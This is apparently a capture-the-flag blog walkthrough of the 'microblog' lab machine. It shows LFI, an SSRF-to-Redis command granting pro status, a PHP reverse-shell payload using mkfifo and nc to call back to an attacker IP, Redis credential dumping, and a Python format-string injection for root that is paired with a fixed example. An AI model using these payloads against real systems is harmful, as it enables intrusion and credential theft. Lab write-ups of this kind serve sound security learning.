Introduction
In this walkthrough, I’m going to explain how I pwned this medium box. This is surely not a medium box (I expected it to be hard). So let’s start 🙂
RECON
NMAP
In the Nmap scan we found that three ports are open (ports 22, 80 and 3000).
![](http://techyrick.com/wp-content/uploads/2023/05/image-1024x382.png)
Adding IP
While visiting the IP we can see that we have to add app.microblog.htb to our /etc/hosts file to access it locally.
Subdomain Enumeration
Found only 2 subdomains: app and sunny. Add both of these to our /etc/hosts file.
![](http://techyrick.com/wp-content/uploads/2023/05/image-1.png)
Now let’s visit the site we found.
Website
Register a new account on app.microblog.htb to check all the functionality.
![](http://techyrick.com/wp-content/uploads/2023/05/image-2-1024x594.png)
When we click on “Contribute Here!” we can see the source code of “app.microblog.htb”.
![](http://techyrick.com/wp-content/uploads/2023/05/image-3-1024x422.png)
ENUMERATION
LFI
While checking the functionality I saw that we can use the id parameter for LFI.
For that, first create a blog and go to edit blog.
![](http://techyrick.com/wp-content/uploads/2023/05/image-4-1024x739.png)
Now capture the request that adds the h1/text.
![](http://techyrick.com/wp-content/uploads/2023/05/image-5-1024x628.png)
In this request, check the ID parameter: you can use it for LFI.
![](http://techyrick.com/wp-content/uploads/2023/05/image-6-1024x370.png)
Getting Pro
On the Dashboard page and in the source code I saw something about pro. After a little research I found the way to get pro.
Here is the resource for that: https://redis.io/commands/hset/
We have to assign pro to our session using SSRF.
Using the command below we can assign ourselves as a pro user.
```
curl -X "HSET" http://microblog.htb/static/unix:%2fvar%2frun%2fredis%2fredis.sock:testy%20pro%20true%20a/b
```
Note: If you entered a different username while registering, make sure to change that username in the command. I registered as testy, so I used testy.
![](http://techyrick.com/wp-content/uploads/2023/05/image-7-1024x178.png)
Now we can also add an image to the blog. I tried to get a reverse shell through it but it was a rabbit hole; there was no image upload vulnerability. Rather, thanks to pro, we now have access to the uploads directory.
FootHold
Use this request body to upload the reverse shell on the target (change your blog name):
```
id=/var/www/microblog/<your_blog_name>/uploads/rev.php&header=<%3fphp+echo+shell_exec("rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.14.30+443+>/tmp/f")%3b%3f>
```
![](http://techyrick.com/wp-content/uploads/2023/05/image-8-1024x612.png)
After visiting /uploads/rev.php we will get our reverse shell. Let’s see.
And boom, we got a shell.
![](http://techyrick.com/wp-content/uploads/2023/05/image-1024x182.jpg)
USER
For user we have to connect with redis-cli over the Redis Unix socket.
```
# First run this
redis-cli -s /var/run/redis/redis.sock
# then list the keys
keys *
# then, having found the user cooper.dooper, dump the hash
hgetall cooper.dooper
```
The commands above will get us the user credentials.
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-from-2023-05-15-07-17-14-1024x582.png)
Now log in with SSH as cooper:zooperdoopercooper
![](http://techyrick.com/wp-content/uploads/2023/05/image-9-1024x411.png)
ROOT
Getting root on this machine is pretty confusing; I will attach the resource below 🙂
![](http://techyrick.com/wp-content/uploads/2023/05/image-10-1024x248.png)
Using sudo -l, I found that we can run /usr/bin/license, and this file is readable. I tried many things and found this:
https://podalirius.net/en/articles/python-format-string-vulnerabilities/
The format function is vulnerable.
1. Register a user using redis-cli and put the above vulnerability in one of the user's fields (the first-name field in the command below) to print all variables.
```
HSET test2 username test1 password test first-name {license.__init__.__globals__} last-name test pro false
```
2. Now run /usr/bin/license as sudo to provision the license for our test2 user.
```
sudo /usr/bin/license -p test2
```
3. This will print all the variables, like this:
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-from-2023-05-15-07-34-22-1024x558.png)
Now check for the secret key parameter in the output; there you will find the password for root.
![](http://techyrick.com/wp-content/uploads/2023/05/image-11.png)
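To see why a format string like the one above reaches module globals, here is an added example of my own (not the box's /usr/bin/license script): a renderer that splices user text into the format template, beside a fixed version that keeps the template constant. SECRET_KEY, License and the function names are assumptions for the demo.

```python
# Constructed illustration of the str.format() issue exploited above; it is
# not the box's /usr/bin/license and the secret below is a placeholder.
SECRET_KEY = "constructed-placeholder-secret"


class License:
    """Stand-in for the object the real script passes to format()."""

    def __init__(self, owner: str) -> None:
        self.owner = owner


def render_vulnerable(first_name: str, lic: License) -> str:
    # BUG: the user-supplied value is spliced into the *template* before
    # format() runs, so a replacement field in it is evaluated. Attribute and
    # index lookups inside the field walk lic -> __init__ -> __globals__ and
    # read any module-level name, including SECRET_KEY.
    template = "License for " + first_name + " (owner: {license.owner})"
    return template.format(license=lic)


def render_fixed(first_name: str, lic: License) -> str:
    # FIX: the template is a constant; user input is only ever an argument
    # value, so braces in it are copied literally and never interpreted.
    return "License for {name} (owner: {owner})".format(name=first_name,
                                                        owner=lic.owner)


def leaks_secret(renderer, probe: str) -> bool:
    """True if rendering the probe makes SECRET_KEY's value appear in the output."""
    try:
        return SECRET_KEY in renderer(probe, License("cooper"))
    except (AttributeError, KeyError, IndexError, ValueError):
        return False


# Same shape as the payload used on the page; this one indexes a single
# global by name instead of dumping the whole dictionary.
PROBE = "{license.__init__.__globals__[SECRET_KEY]}"

if __name__ == "__main__":
    for name, fn in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print(f"{name:10s} leaks secret: {leaks_secret(fn, PROBE)}")
```

The defensive rule this shows: never let untrusted input become the format string itself; pass it only as a value to a fixed template.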
Now we have SSH for root too 🙂 root:unCR4ckaBL3Pa$$w0rd
Then log in as root and grab the flag.
![](http://techyrick.com/wp-content/uploads/2023/05/image-12-1024x412.png)
Conclusion
In my opinion this is not really a medium box, but I still loved it. I would rate it 9/10 as a medium box.
Thanks for reading the blog. For any doubts you can comment below 🙂
Jai Shree Krishna ❤️